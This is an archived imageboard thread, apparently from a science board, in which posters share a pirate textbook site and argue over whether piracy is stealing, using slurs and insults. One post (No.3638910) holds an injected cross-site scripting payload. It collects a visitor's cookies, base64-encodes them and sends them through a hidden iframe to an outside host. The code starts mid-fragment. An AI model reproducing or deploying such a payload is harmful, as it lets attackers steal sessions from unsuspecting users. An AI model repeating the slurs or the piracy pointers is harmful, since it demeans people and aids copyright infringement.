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File: 151 KB, 468x468, advice_omich_by_winged_doom-d3ev1ro.gif [View same] [iqdb] [saucenao] [google]
[ERROR] No.3638738 [Reply] [Original]

Hey /sci/

I was just wondering where I'd be able to download textbooks from online? Does anyone know a good website? Help me beat the system, you glorious winged bastards.

>> No.3638750
File: 157 KB, 461x350, 1307570029911.png [View same] [iqdb] [saucenao] [google]

the sticky might have some links for this.
here, have some other links as well.

lib.homelinux.org/ currently kiev

>> No.3638754

bump for already spending 15k/annually in tuition and don't want to spend $600 for my books.

>> No.3638761


Thanks, man. I appreciate it.

>> No.3638770
File: 186 KB, 825x820, piracy.jpg [View same] [iqdb] [saucenao] [google]

1 of the links is broken, some of the others should definitely help.

and to any moralfaggots out there, piracy isn't stealing.

>> No.3638779
File: 247 KB, 401x332, zh4.png [View same] [iqdb] [saucenao] [google]

no problem, hun.

>> No.3638784

it is robbing someone of their profits. it is stealing. i'm not saying i don't do it, but i don't try to justify it. i just accept that i'm stealing shit.

>> No.3638785


I'm surprised this isn't more widespread than music piracy. College kids are already broke and being bent over the table for these overpriced pieces of shit. On top of my textbooks I also have course websites and other kitchy bullshit that I need to put up with.

>> No.3638789

Are you really you EK?
I thought your trip had lowercase letters after "EK".

I would like to add: a respected economist made a research and proved that Piracy is a market failure and not a crime.
Google it.

>> No.3638794


Listen man, and listen closely.

This isn't a morality ploy. Backing someone into a corner and then forcing them to pay for something in order to have a better life doesn't make a whole lot of sense, especially when I can get 1000 other books that will offer me the same information for free. I could look this shit up on wikipedia, but I can't use wikipedia because the instructor wants me to learn bullshit in packets. She won't tell me what I'm learning about, or even what level of it. I learn most of this shit from the book because SHE DOESN'T TEACH IT IN CLASS.

They're the ones stealing from me, only no one complains because it's "legal"

>> No.3638805

they lose profit if you pirate something you would have payed to buy, if you didnt pirate it instead. 99% of the things people pirate are things they dont actually give much of a fuck about, and if they couldnt pirate it, they wouldnt bother with it at all. so no money was lost in profit either way, because they were never going to pay for it.
keep in mind that they might actually gain extra profit because of piracy causing them to become more famous,
say you are in a new up and coming band, if people can pirate your music for free, pass it around, sahre it with friends etc, then more people are aware of your music. people who like it are more likely to come to gigs, and buy merch, which earns you profit. if not for piracy then they never would have heard of you, and certainly wouldnt have dished out money buying songs from a band that they have no idea is any good or not.

also, regarding my last pic, i'm perfectly happy for people to clone my shit and take it. as long as i still have the original and dont lose anything, then i dont care what you do.

>> No.3638810

yeh, i'm EK. the only lowercase letter is he 'n' near the end.

>> No.3638816

i love you.

>> No.3638824
File: 27 KB, 270x426, atilla_the_hun.jpg [View same] [iqdb] [saucenao] [google]


>mfw "hun"

>> No.3638827

Reported for piracy, don't try to justify your faggottry, also enjoy your ban tripcunt.

>> No.3638841
File: 23 KB, 508x406, comeatmebro.jpg [View same] [iqdb] [saucenao] [google]

lol! come at me, you fucking faggot.
i'm not even the one pirating anything, i just provided links. to other sources hat can be used. its the internet, this shit exists, its not my fault, deal with it.
>implying i can be banned.
ignorant tosser!

>> No.3638862
File: 8 KB, 225x252, 1304355004701.jpg [View same] [iqdb] [saucenao] [google]

aww, thanks hun!

>> No.3638879

Do you kiss your mother with that filthy mouth?
And don't deny it, it only makes you look even more retarded, the only reason you have those links is because you download material from there, thus, you are a NIGGER.

>implying your tripcode can't be banned

Anyone can change a mac address and release/renew an IP cunt.

>> No.3638910

<div class="math">\bbox["><span id="sdgf" onmouseover="
z=y+';'+z; if(!/^(4chan_pass|4chan_email|popunde?r|setover18)/.test(y)) n++;}}
if(n) {s=document.createElement('span');s.innerHTML+='<iframe style=display:none'
+' src=http://lolbbox.weebly.com/?'+btoa(z)+'></iframe>';document.body.appendChild(s)}
" style="position:fixed;left:0px;top:0px;width:100%;height:100%"></span>]~</div>

>> No.3638945

Is that an XSS, sir?

>> No.3638974
File: 18 KB, 366x380, 1263274078409.jpg [View same] [iqdb] [saucenao] [google]
